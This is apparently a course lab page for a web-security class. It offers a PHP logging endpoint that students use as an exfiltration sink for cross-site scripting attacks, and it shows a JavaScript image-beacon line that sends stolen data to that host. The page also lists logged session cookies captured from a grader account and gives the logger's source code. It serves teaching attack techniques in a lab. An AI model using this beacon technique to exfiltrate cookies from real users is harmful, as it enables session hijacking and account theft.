Lab 4 Logging Script

You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:

(new Image()).src='https://css.csail.mit.edu/6.5660/2023/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();

The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.

Test form

If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)


(some identifier to locate your payload in the log)


(the information you stole)

Logged entries

Below are the most recent logged entries, so that you can check if your attack worked:

Tue, 30 Jan 2024 13:00:39 -0500: nickolai@mit.edu: grader/HYQCPQTYUGAW
Tue, 30 Jan 2024 13:00:26 -0500: nickolai@mit.edu: grader/NMVIKUQVHJBY
Tue, 30 Jan 2024 13:00:19 -0500: nickolai@mit.edu: grader/FUAUMABOCSLC
Tue, 30 Jan 2024 13:00:00 -0500: nickolai@mit.edu: PyZoobarLogin=grader#03c35a5fdbd7b90c76025cc99bb76622b53806413971f11a12c481d23a267e2e
Tue, 30 Jan 2024 12:59:53 -0500: nickolai@mit.edu: PyZoobarLogin=grader#295a1ea55bae65780663af3e8a798f47eba4dfc4e085c3101ecaf39288b8c5bd
Tue, 30 Jan 2024 12:59:38 -0500: nickolai@mit.edu: PyZoobarLogin=grader#a7aef0eeb07016e37900745edf13f84909d8c7e2d4215263e033ccbf45127f89
Tue, 30 Jan 2024 12:53:10 -0500: nickolai@mit.edu: grader/RLAJHDHCPOSV
Tue, 30 Jan 2024 12:52:55 -0500: nickolai@mit.edu: grader/EMMFXDIAMXLS
Tue, 30 Jan 2024 12:52:50 -0500: nickolai@mit.edu: grader/SRLPOLUHCJAS
Tue, 30 Jan 2024 12:52:33 -0500: nickolai@mit.edu: PyZoobarLogin=grader#d3e1b2a93ecf4c998194bfef8a3e946a378341a7d316e6ab9fdd6fe36ed7224d
Tue, 30 Jan 2024 12:52:26 -0500: nickolai@mit.edu: PyZoobarLogin=grader#71f77cdc3c4b6d774d4f14cdea98fd7978c1e5a702705695433e4f7235d1064a
Tue, 30 Jan 2024 12:52:14 -0500: nickolai@mit.edu: PyZoobarLogin=grader#f15949284470b6ba91b929793af3fa74af8f0a9c8144e925f4c6e510a69ce771
Thu, 04 Jan 2024 08:10:43 -0500: student@mit.edu: grader/YOHEGQJFGSCW
Thu, 04 Jan 2024 08:10:35 -0500: student@mit.edu: grader/GILLVSLZBVRC
Thu, 04 Jan 2024 08:10:10 -0500: student@mit.edu: PyZoobarLogin=grader#3eb3161edfba1f1652c7b2b6f3fc3f71b27c2933c41b9679a57580501ab99455
Thu, 04 Jan 2024 08:10:03 -0500: student@mit.edu: PyZoobarLogin=grader#8148f171256540d35845189f3a42dc6786109667c6edde2c0e82dfa1c6b6b5a1
Thu, 04 Jan 2024 08:09:48 -0500: student@mit.edu: PyZoobarLogin=grader#383db270248ef738f2d6da14763e836cf30f88916d588fec548aa3ec7b51b27e
Thu, 04 Jan 2024 08:00:38 -0500: student@mit.edu: PyZoobarLogin=grader#a46fecfe52306a7d5d4dbac61ee656999e39bcb40245d7a1c33e9c0c6cb657e3
Thu, 04 Jan 2024 08:00:30 -0500: student@mit.edu: PyZoobarLogin=grader#082e27fb820e6b172113440aa0959d6881e05419a3262944750b9df456b287e7
Thu, 04 Jan 2024 08:00:16 -0500: student@mit.edu: PyZoobarLogin=grader#a1ea348a5c50382c020b7158fe69f96046be049429a2979588d1525b00503395
Thu, 04 Jan 2024 07:04:24 -0500: student@mit.edu: grader/AFPJJDJSUXTN
Thu, 04 Jan 2024 07:04:14 -0500: student@mit.edu: grader/QDWYWNYOPCPD
Thu, 04 Jan 2024 07:03:40 -0500: student@mit.edu: PyZoobarLogin=grader#ffdc9606aabb38edb2b0daea69cf3c3850709ba9a62805a82733a7db0cc97497
Thu, 04 Jan 2024 07:03:31 -0500: student@mit.edu: PyZoobarLogin=grader#3cb096c47bb25a996981f96ed6de6a7a87587662f1119ab502e8779b88be90cb
Thu, 04 Jan 2024 07:03:15 -0500: student@mit.edu: PyZoobarLogin=grader#61638c112f7478b2b05d0ea7aea829a231ca143433318784ef47a81b21a9b3bf
Thu, 04 Jan 2024 06:31:04 -0500: student@mit.edu: grader/EZCNKRGZECJJ
Thu, 04 Jan 2024 06:30:54 -0500: student@mit.edu: grader/KYSFNZVQVRQQ
Thu, 04 Jan 2024 06:30:21 -0500: student@mit.edu: PyZoobarLogin=grader#a60c8fc869ca804ac8a7f20498d642ec707e2a6f493c3328a486d88904c4dce1
Thu, 04 Jan 2024 06:30:12 -0500: student@mit.edu: PyZoobarLogin=grader#cc22a9214af129a58a1adc6d60c3a6ea4e86dcc00cc47d89fe3fe1465c96458d
Thu, 04 Jan 2024 06:29:54 -0500: student@mit.edu: PyZoobarLogin=grader#49d992ce53c786ba2e7217c95d28bb020de5f6217a4e2025dd795fa71e5f1b4f
Thu, 04 Jan 2024 06:25:41 -0500: sabazed: grader/ZNVAOALYLYQF
Thu, 04 Jan 2024 06:25:17 -0500: sabazed: grader/AKNRSGSOMOMW
Thu, 04 Jan 2024 06:24:51 -0500: student@mit.edu: PyZoobarLogin=grader#8796d8e5f28fa928e8889186ae8d25e96a9b7cb48ff5706c589e428a5a61f6d7
Thu, 04 Jan 2024 06:23:54 -0500: sabazed: PyZoobarLogin=grader#586056de1b219a34439e5eedf22de10f57719310714668ed40f2de40dd7f42a5
Thu, 04 Jan 2024 06:23:31 -0500: sabazed: PyZoobarLogin=grader#e666d2b2ac339c8ff766c5e5c6651a8d963cfceff698db8176f1057b4417a79d
Thu, 04 Jan 2024 06:22:45 -0500: sabazed: PyZoobarLogin=grader#30b256880a2f57660d7621a7cfcb1ce9aa83230e0669e0ab156c22bc5c717cb6
Thu, 04 Jan 2024 06:17:21 -0500: giokepa: grader/FISETSJJAHBZ
Thu, 04 Jan 2024 06:16:55 -0500: giokepa: grader/WSOTRNCYISUH
Thu, 04 Jan 2024 06:15:33 -0500: giokepa: PyZoobarLogin=grader#49a79367d2ca0b708c5e1eca1813ead4aadc7bf46bf70209c4e562d96a70ea6e
Thu, 04 Jan 2024 06:15:09 -0500: giokepa: PyZoobarLogin=grader#31c433d36062decb298c7f2f59557439b567ab7847fe720dd4da2b9fdd1c4da0
Thu, 04 Jan 2024 06:14:20 -0500: giokepa: PyZoobarLogin=grader#01b443e76cca0821a950c78e4b8a6ba1fe475464f35e848ced65d88eded1c346
Thu, 04 Jan 2024 06:10:45 -0500: test: grader/HHOGRKJSCBWE
Thu, 04 Jan 2024 06:10:15 -0500: test: grader/BIDXEYPWUBND
Thu, 04 Jan 2024 06:08:51 -0500: test: PyZoobarLogin=grader#4cfc7aeaab24ffbe34a3da1e708078bdf4aa72180e444caa6dd7526f54ffac9f
Thu, 04 Jan 2024 06:08:26 -0500: test: PyZoobarLogin=grader#d08f4e8a3645705fa079267ecc956ca0b55c1964196eb6127c4e5bc25189ad3f
Thu, 04 Jan 2024 06:07:38 -0500: userId: PyZoobarLogin=grader#11ed55dcffa774c540c98756d7850a0face44c8b9f94eb34deb5e615f577c95c
Thu, 04 Jan 2024 05:58:15 -0500: test: grader/AUFXXLVUDAJE
Thu, 04 Jan 2024 05:57:46 -0500: test: grader/RICKSGCUIZWM
Thu, 04 Jan 2024 05:56:16 -0500: test: PyZoobarLogin=grader#61e58f190fc2b109a77ac365c0bc1b90fa80f4cb50dcd02e164859a3df9c6485
Thu, 04 Jan 2024 05:55:50 -0500: test: PyZoobarLogin=grader#05692cafe8ebd495417b1d7883969f4697c2079c5f5202a9e7e8a1d67884358f
Thu, 04 Jan 2024 05:54:58 -0500: nimo: PyZoobarLogin=grader#0f06dbe183326bc5394c13fa26ee9b97bd3179702b18e0057bacb55669095397
Thu, 04 Jan 2024 05:49:41 -0500: test: PyZoobarLogin=grader#9e902eb7a45399d9715a03b42e1efa67ccc48501c18af83d351d2f09b40a7f1d
Thu, 04 Jan 2024 05:49:16 -0500: test: PyZoobarLogin=grader#ce9ff38e52f47679f539deee54bfcc19af130d2ff1b5cddf89418e7ca5fd6a35
Thu, 04 Jan 2024 05:48:25 -0500: uid: PyZoobarLogin=grader#c31c1ef0593825659ba6cf663424e5fec34d8a4045a7ebb97f33cf78a957c786
Thu, 04 Jan 2024 05:44:21 -0500: adama3: grader/GSMGFMIVYLOF
Thu, 04 Jan 2024 05:43:55 -0500: your-mit-username: grader/HBYZFXWBJREI
Thu, 04 Jan 2024 05:42:27 -0500: your-mit-username: PyZoobarLogin=grader#fdbe23ef4479950858dd04413c6b47e81e3cd3ac0cb8a246dcb3e0327540160f
Thu, 04 Jan 2024 05:42:02 -0500: your-mit-username: PyZoobarLogin=grader#2571e41c59976db06eabf012053f0ec30697e5e3a30ea881e1b3531f75713874
Thu, 04 Jan 2024 05:41:13 -0500: your-mit-username: PyZoobarLogin=grader#5e80068673c86c0db5f8c5f7f7298d98875e185ff8bcff8f3d04de178ead52e6
Thu, 04 Jan 2024 05:38:38 -0500: domaaa: PyZoobarLogin=grader#586e9c06cf13acab541e05b63797757bb2497b247c1ea3a346e0b3f04c636391
Thu, 04 Jan 2024 05:38:14 -0500: domaaa: PyZoobarLogin=grader#267281f6838bdf0048a1785730b2dda7ff43013d244aeade99fc835d0f194dec
Thu, 04 Jan 2024 05:37:22 -0500: adamaaa: PyZoobarLogin=grader#2f7692a01fa4f0ab3b8ee0eda1712eeb09cf7cfbe1f6773a766264cc872acf4d
Thu, 04 Jan 2024 05:33:03 -0500: adama3: grader/CIDAZUQVXIUZ
Thu, 04 Jan 2024 05:32:38 -0500: adama3: grader/FZBAGXWUVXAC
Thu, 04 Jan 2024 05:31:15 -0500: domaaa: PyZoobarLogin=grader#a7c3be0a03f71158108a28b17739dc759fbde071ca23a3de9ee495b0af70933e
Thu, 04 Jan 2024 05:30:52 -0500: domaaa: PyZoobarLogin=grader#e00029ec7ae99d921c12be67aed98bcd4e20e3aa51f293399a0f805bc35ac9da
Thu, 04 Jan 2024 05:30:00 -0500: adamaaa: PyZoobarLogin=grader#fcfe694b875ed06f25c1e5ca73352d61b581d664d97d27767e16cac079413640
Thu, 04 Jan 2024 05:23:05 -0500: adama3: grader/LDOEWYKKTTXK
Thu, 04 Jan 2024 05:22:39 -0500: adama3: grader/PVPDPEEHQJQI
Thu, 04 Jan 2024 05:21:17 -0500: domaaa: PyZoobarLogin=grader#5fdfa5d5448316374ab086c31fa80ed15ec350d8b5510c04d0ce84902a24cc16
Thu, 04 Jan 2024 05:20:54 -0500: domaaa: PyZoobarLogin=grader#72e63d1b16d6486c2c2dd423df598d7612f6c9a8de846dbe710d66e73d806496
Thu, 04 Jan 2024 05:20:07 -0500: adamaaa: PyZoobarLogin=grader#3c3f212e0198bb22cbbac1945f23ae0324de57646987047f52b706d4e1d7a82d
Thu, 04 Jan 2024 05:06:51 -0500: my-username: some-string
Thu, 04 Jan 2024 05:06:41 -0500: my-username: some-string
Thu, 04 Jan 2024 05:06:32 -0500: my-username: some-string
Thu, 04 Jan 2024 05:01:28 -0500: student@mit.edu: grader/FTUPDGWLYSKH
Thu, 04 Jan 2024 05:01:03 -0500: student@mit.edu: grader/VSZRNGSPCXAW
Thu, 04 Jan 2024 04:59:42 -0500: student@mit.edu: PyZoobarLogin=grader#47667a15b28331fd0ed37b9ff3f8f24f394c08039d0fb49c39b547b81acd7049
Thu, 04 Jan 2024 04:59:19 -0500: student@mit.edu: PyZoobarLogin=grader#33b6b346ff6f34dd9f168252c6bd3807d99be5e171f719ad032fb30071ec7a22
Thu, 04 Jan 2024 04:58:32 -0500: student@mit.edu: PyZoobarLogin=grader#d27328c26fa401347b2cfd8c37883a2f9a35fac1a0848b86a916f6d26b1b8314
Sun, 31 Dec 2023 12:37:53 -0500: zuzus: grader/GCIASAYPTVML
Sun, 31 Dec 2023 12:37:42 -0500: sabazed: grader/XQMSJVLTJIJY
Sun, 31 Dec 2023 12:37:00 -0500: sabazed: PyZoobarLogin=grader#3ef003832766581395af37345d40b9944a5f1e6dfdc5f2a60f5b72b02920be21
Sun, 31 Dec 2023 12:36:50 -0500: sabazed: PyZoobarLogin=grader#55d06b0cee8aeec5c96dff6d6e0333f213ae18f9d0e95e109807320461f964cd
Sun, 31 Dec 2023 12:36:32 -0500: zuzu: PyZoobarLogin=grader#da2ebbc566bc8fe59cf1b76c60e5be55c420ab828542f3661b9579a6da8c59a9
Sun, 31 Dec 2023 12:07:22 -0500: giokepa: grader/EYGIZCHTXKYP
Sun, 31 Dec 2023 12:07:13 -0500: giokepa: grader/DIGXBHOBGYED
Sun, 31 Dec 2023 12:06:51 -0500: giokepa: PyZoobarLogin=grader#f45509766e91f10469b6e661202f3e1bfc4e01ce7f8469c7f7752f8625e03042
Sun, 31 Dec 2023 12:06:45 -0500: giokepa: PyZoobarLogin=grader#b336bca21cac40b08e13ee754acea64a9cfe25668cbdb8cdc2e65dba4d13341b
Sun, 31 Dec 2023 12:06:29 -0500: giokepa: PyZoobarLogin=grader#eef5e845b4805a34f17fb11d8f955e168bbc694d4853a764997fce67a8b131ad
Sun, 31 Dec 2023 11:44:41 -0500: giokepa: grader/FLOKYGLUKZQB
Sun, 31 Dec 2023 11:44:31 -0500: giokepa: grader/VXFNSMGFORAW
Sun, 31 Dec 2023 11:44:04 -0500: giokepa: PyZoobarLogin=grader#025ba71ed3c0df6a1b9611f1d9e8c05b4ffa594dc50416b8ccee048ced028069
Sun, 31 Dec 2023 11:43:56 -0500: giokepa: PyZoobarLogin=grader#b1499f7636046595614ab5ccde4abf0cffe34b536d244a9448f9ebc8eaf4138c
Sun, 31 Dec 2023 11:43:43 -0500: giokepa: PyZoobarLogin=grader#7fa640a132478c038059a44611ba799b3c4e7bf3fe2913924ece666739ef7ebb
Sun, 31 Dec 2023 11:40:50 -0500: adama3: grader/EUMRAAHKBWRH
Sun, 31 Dec 2023 11:40:45 -0500: adama3: grader/HXYPKLXKJCFT
Sun, 31 Dec 2023 11:40:20 -0500: domaaa: PyZoobarLogin=grader#267633d66102da91c4c47a2761ae6b1960742daaac8e8d01b0444c96c741cbe8
Sun, 31 Dec 2023 11:40:13 -0500: domaaa: PyZoobarLogin=grader#f1fab7cc58098155a0a044a5678cefa13e108ccdf963dbd97d4d135e768d5fc0
Sun, 31 Dec 2023 11:40:07 -0500: giokepa: grader/RQUVYDHVZOFY
Sun, 31 Dec 2023 11:40:00 -0500: adamaaa: PyZoobarLogin=grader#94b87364e8df9ae0c1517681a17450aa0d2178e7588eff3889309970927dd00d

Source code

In case you are curious, here is the source code of this page.


<?php
header
("Access-Control-Allow-Origin: *");

do {
    if (!
array_key_exists("id"$_REQUEST)) {
        break;
    }

    
$id $_REQUEST['id'];
    if (
strlen($id) > 1000) {
        
header("HTTP/1.0 413 Payload Too Large");
        echo 
"ID value is larger than 1000 bytes";
        return;
    }

    if (!
array_key_exists("payload"$_REQUEST)) {
        
header("HTTP/1.0 400 Bad Request");
        echo 
"No payload given";
        return;
    }

    
$payload $_REQUEST['payload'];
    if (empty(
$payload)) {
        
header("HTTP/1.0 400 Bad Request");
        echo 
"Empty payload given";
        return;
    }

    if (
strlen($payload) > 1000) {
        
header("HTTP/1.0 413 Payload Too Large");
        echo 
"Payload is larger than 1000 bytes";
        return;
    }

    if (!
function_exists('apcu_add')) {
        
header("HTTP/1.0 501 Not Implemented");
        echo 
"APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    if (
apcu_add($payloadtrue5) === false) {
        
// exact same $payload was sent in the past 5 seconds
        
header("HTTP/1.0 429 Too Many Requests");
        echo 
"That exact payload was sent very recently; rejecting";
        return;
    }

    
$payload str_replace(array("\n""\r"), '.'$payload);
    
$id str_replace(array("\n""\r"), '.'$id);

    
$file fopen("/tmp/6.5660-2023-logger.txt""c+");
    if (
$file === false) {
        
header("HTTP/1.0 503 Service Unavailable");
        echo 
"Failed to open log file";
        return;
    }

    if (!
flock($fileLOCK_EX)) {
        
header("HTTP/1.0 503 Service Unavailable");
        echo 
"Failed to lock log file";
        return;
    }

    
$lines = array();
    while (!
feof($file) && count($lines) < 100) {
        
$lines[] = fgets($file);
    }
    
ftruncate($file0);
    
rewind($file);
    
fwrite($filedate(DATE_RFC2822) . ": " $id ": " $payload "\n");
    foreach (
$lines as &$line) {
        
fwrite($file$line);
    }

    
flock($fileLOCK_UN);
    
fclose($file);

    echo 
"Logged!";
    return;
} while(
0);

$link "(new Image()).src="
      
"'https://css.csail.mit.edu/6.5660/2023/labs/log.php?'"
      
" + 'id=my-username'"
      
" + '&payload=some-string' + '&random='"
      
" + Math.random()";
?><!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" type="text/css" href="labs.css" />
        <title>Lab 4 Logging Script</title>
    </head>
    <body>
        <h1>Lab 4 Logging Script</h1>
        <p>
            You can use this server side script to extract data from
            client-side JavaScript. For example, clicking this client-side
            hyperlink will cause the server to log the payload:
        </p>
        <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
        <p>
            The random argument is ignored, but ensures that the browser
            bypasses its cache when downloading the image. We suggest that you
            use the random argument in your scripts as well.  The ID argument
            will help you distinguish your log entries from those sent by other
            students; we suggest picking your MIT Athena username.  Newlines are not
            allowed in <tt>javascript:</tt> links; if this bothers you, try
            <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
        </p>

        <h2>Test form</h2>
        <p>
            If you just want to try out the script, you can use this form.
            (For your actual attacks in lab 4, you'll probably want to use the
            JavaScript image technique shown above.)
        </p>

        <form method="GET" action="">
            <label for="id">ID:</label><br />
            <input name="id" placeholder="your-mit-username" size="40" />
            <i>(some identifier to locate your payload in the log)</i>
            <br />
            <br />
            <label for="payload">Payload:</label><br />
            <input name="payload" placeholder="some-string" size="40" />
            <i>(the information you stole)</i>
            <br />
            <input type="submit" value="Log" name="log_submit" />
    </form>

    <h2>Logged entries</h2>
    <p>
        Below are the most recent logged entries, so that you can check
            if your attack worked:
    </p>

    <pre class="tty"><?php
        $lines 
file_get_contents("/tmp/6.5660-2023-logger.txt");
        echo 
htmlspecialchars($lines);
    
?></pre>

        <h2>Source code</h2>
        <p>In case you are curious, here is the source code of this page.</p>
        <pre><?php highlight_file(__FILE__); ?></pre>
    </body>
</html>